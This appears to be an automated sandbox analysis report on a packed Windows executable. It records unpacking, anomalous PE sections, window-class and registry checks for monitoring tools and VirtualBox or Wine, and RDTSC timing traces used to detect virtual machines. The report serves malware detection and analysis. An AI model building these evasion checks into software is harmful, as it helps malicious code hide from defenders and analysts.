Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSection loaded: winrnr.dllJump to behavior
Source: 28PCC9oa8s.exeStatic file information: File size 4450816 > 1048576
Source: 28PCC9oa8s.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x284800
Source: 28PCC9oa8s.exeStatic PE information: Raw size of souunsyz is bigger than: 0x100000 < 0x1b6600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\28PCC9oa8s.exeUnpacked PE file: 0.2.28PCC9oa8s.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;souunsyz:EW;zkkgfegk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;souunsyz:EW;zkkgfegk:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 28PCC9oa8s.exeStatic PE information: real checksum: 0x449815 should be: 0x446a5c
Source: 28PCC9oa8s.exeStatic PE information: section name:
Source: 28PCC9oa8s.exeStatic PE information: section name: .idata
Source: 28PCC9oa8s.exeStatic PE information: section name:
Source: 28PCC9oa8s.exeStatic PE information: section name: souunsyz
Source: 28PCC9oa8s.exeStatic PE information: section name: zkkgfegk
Source: 28PCC9oa8s.exeStatic PE information: section name: .taggant
Source: 28PCC9oa8s.exeStatic PE information: section name: souunsyz entropy: 7.9567248280767044

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 74E63D second address: 74E650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9834D7504Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 74E650 second address: 74DE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a stc 0x0000000b push dword ptr [ebp+122D0C49h] 0x00000011 jmp 00007F98351AAB29h 0x00000016 call dword ptr [ebp+122D26A2h] 0x0000001c pushad 0x0000001d sub dword ptr [ebp+122D1AFAh], esi 0x00000023 xor eax, eax 0x00000025 jmp 00007F98351AAB25h 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e cmc 0x0000002f js 00007F98351AAB17h 0x00000035 clc 0x00000036 mov dword ptr [ebp+122D3B6Bh], eax 0x0000003c stc 0x0000003d mov esi, 0000003Ch 0x00000042 pushad 0x00000043 movsx edi, di 0x00000046 movzx esi, dx 0x00000049 popad 0x0000004a pushad 0x0000004b ja 00007F98351AAB18h 0x00000051 mov ecx, edx 0x00000053 sbb ch, FFFFFFABh 0x00000056 popad 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jmp 00007F98351AAB25h 0x00000060 lodsw 0x00000062 mov dword ptr [ebp+122D1AFAh], eax 0x00000068 pushad 0x00000069 jne 00007F98351AAB28h 0x0000006f mov ax, B91Ch 0x00000073 popad 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 sub dword ptr [ebp+122D3938h], ecx 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 jne 00007F98351AAB1Ch 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b jmp 00007F98351AAB22h 0x00000090 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C62A3 second address: 8C62A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C62A8 second address: 8C62B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9778 second address: 8C977E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C981B second address: 8C987E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F98351AAB1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+122D3938h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F98351AAB18h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d or ecx, dword ptr [ebp+122D1BEBh] 0x00000033 call 00007F98351AAB19h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F98351AAB27h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C987E second address: 8C98D4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9834D7505Ch 0x00000008 jmp 00007F9834D75056h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 ja 00007F9834D75058h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9834D75057h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C98D4 second address: 8C98FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F98351AAB28h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C98FA second address: 8C9904 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9834D75046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9AA3 second address: 8C9AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9AA9 second address: 8C9AF6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jnl 00007F9834D75052h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F9834D75048h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push 584A7320h 0x00000030 push eax 0x00000031 push edx 0x00000032 push esi 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 pop esi 0x00000036 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9AF6 second address: 8C9B5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 584A73A0h 0x00000010 sub dword ptr [ebp+122D3950h], ecx 0x00000016 push 00000003h 0x00000018 jg 00007F98351AAB1Ch 0x0000001e mov esi, dword ptr [ebp+122D3ACFh] 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F98351AAB18h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000017h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 clc 0x00000041 or di, 408Eh 0x00000046 push 00000003h 0x00000048 and cl, FFFFFF99h 0x0000004b call 00007F98351AAB19h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9B5E second address: 8C9B73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9B73 second address: 8C9B78 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9B78 second address: 8C9B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 jc 00007F9834D75048h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F9834D75046h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9B97 second address: 8C9C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F98351AAB22h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F98351AAB1Fh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c pop edx 0x0000001d pop eax 0x0000001e jbe 00007F98351AAB1Eh 0x00000024 push edx 0x00000025 or esi, 35135E66h 0x0000002b pop edi 0x0000002c lea ebx, dword ptr [ebp+1244F69Ch] 0x00000032 jmp 00007F98351AAB26h 0x00000037 xchg eax, ebx 0x00000038 jmp 00007F98351AAB26h 0x0000003d push eax 0x0000003e push edi 0x0000003f push esi 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9C7A second address: 8C9C8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9C8B second address: 8C9CF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0663B890h 0x00000010 mov ecx, edi 0x00000012 push 00000003h 0x00000014 stc 0x00000015 push 00000000h 0x00000017 or esi, dword ptr [ebp+122D39FFh] 0x0000001d push 00000003h 0x0000001f xor ecx, 14291E16h 0x00000025 push EB625229h 0x0000002a jo 00007F98351AAB23h 0x00000030 jmp 00007F98351AAB1Dh 0x00000035 xor dword ptr [esp], 2B625229h 0x0000003c or di, E4C2h 0x00000041 lea ebx, dword ptr [ebp+1244F6A7h] 0x00000047 mov dl, E7h 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f pop edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C9CF1 second address: 8C9D12 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F9834D75054h 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E803E second address: 8E8044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E8044 second address: 8E804A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E804A second address: 8E807C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F98351AAB1Ah 0x0000000a pushad 0x0000000b jbe 00007F98351AAB16h 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 popad 0x00000019 push edi 0x0000001a jmp 00007F98351AAB1Dh 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E807C second address: 8E8080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E81E4 second address: 8E820E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c jo 00007F98351AAB26h 0x00000012 jmp 00007F98351AAB20h 0x00000017 jo 00007F98351AAB31h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E84CA second address: 8E84D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E84D0 second address: 8E84D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E860E second address: 8E8612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E8612 second address: 8E864C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F98351AAB29h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F98351AAB1Fh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E8BA1 second address: 8E8BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E8BA7 second address: 8E8BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E8D09 second address: 8E8D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E90AF second address: 8E90C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F98351AAB16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E90C1 second address: 8E90C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C1D29 second address: 8C1D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8C1D2D second address: 8C1D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E9ACA second address: 8E9ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 js 00007F98351AAB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8E9ADA second address: 8E9AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8B283C second address: 8B2844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 8B2844 second address: 8B284E instructions: 0x00000000 rdtsc 0x00000002 je 00007F9834D7504Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
